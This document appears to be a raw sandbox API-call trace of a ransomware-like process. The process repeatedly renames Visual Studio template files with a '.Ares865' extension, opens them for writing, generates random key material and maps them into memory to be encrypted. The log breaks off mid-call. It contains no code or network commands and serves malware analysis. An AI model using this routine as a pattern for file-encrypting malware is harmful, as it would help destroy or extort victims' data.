[0055.165] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.165] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.166] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip.Ares865") returned 113 [0055.166] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\form.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\form.zip.ares865"), dwFlags=0x1) returned 1 [0055.166] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\form.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.166] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1300) returned 1 [0055.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.167] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.167] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.168] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.168] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x120 [0055.169] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x190000 [0055.170] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.171] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.171] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.171] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip.Ares865") returned 118 [0055.171] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\loginform.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\loginform.zip.ares865"), dwFlags=0x1) returned 1 [0055.172] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\loginform.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.172] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=45200) returned 1 [0055.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.173] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.174] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.174] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.174] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb390, lpName=0x0) returned 0x120 [0055.177] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb390) returned 0x190000 [0055.180] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.181] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.181] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.182] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip.Ares865") returned 118 [0055.182] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\mdiparent.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\mdiparent.zip.ares865"), dwFlags=0x1) returned 1 [0055.183] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\mdiparent.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.183] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=14007) returned 1 [0055.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.183] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.184] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.184] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.184] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x39c0, lpName=0x0) returned 0x120 [0055.187] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x39c0) returned 0x190000 [0055.188] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.189] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.189] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.189] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.190] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip.Ares865") returned 115 [0055.190] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\module.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\module.zip.ares865"), dwFlags=0x1) returned 1 [0055.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\module.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.191] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=591) returned 1 [0055.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.191] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.192] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.192] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.192] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x550, lpName=0x0) returned 0x120 [0055.194] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x550) returned 0x190000 [0055.195] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.195] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.195] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.196] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip.Ares865") returned 125 [0055.196] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\resourceinternal.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\resourceinternal.zip.ares865"), dwFlags=0x1) returned 1 [0055.197] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\resourceinternal.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.197] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2203) returned 1 [0055.197] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.197] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.197] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.197] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.198] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.198] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.198] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xba0, lpName=0x0) returned 0x120 [0055.199] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xba0) returned 0x190000 [0055.200] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.201] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.201] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.201] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.202] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip.Ares865") returned 125 [0055.202] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\settingsinternal.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\settingsinternal.zip.ares865"), dwFlags=0x1) returned 1 [0055.205] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\settingsinternal.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.205] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1049) returned 1 [0055.205] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.206] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.206] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.206] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.207] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.207] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.207] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x120 [0055.209] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x190000 [0055.209] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.210] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.210] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.211] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip.Ares865") returned 121 [0055.211] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\splashscreen.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\splashscreen.zip.ares865"), dwFlags=0x1) returned 1 [0055.212] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\splashscreen.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.212] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=60438) returned 1 [0055.212] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.212] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.212] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.212] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.213] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.213] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.213] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xef20, lpName=0x0) returned 0x120 [0055.215] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xef20) returned 0x190000 [0055.218] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.219] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.219] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.220] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip.Ares865") returned 113 [0055.220] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\text.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\text.zip.ares865"), dwFlags=0x1) returned 1 [0055.222] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\text.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.222] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=555) returned 1 [0055.222] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.223] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.223] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.223] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.223] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.223] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.224] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x530, lpName=0x0) returned 0x120 [0055.226] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x530) returned 0x190000 [0055.228] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.228] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.228] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.229] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip.Ares865") returned 120 [0055.229] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\usercontrol.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\usercontrol.zip.ares865"), dwFlags=0x1) returned 1 [0055.229] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\usercontrol.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.230] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1457) returned 1 [0055.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.230] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.231] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.231] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.231] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8c0, lpName=0x0) returned 0x120 [0055.233] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, 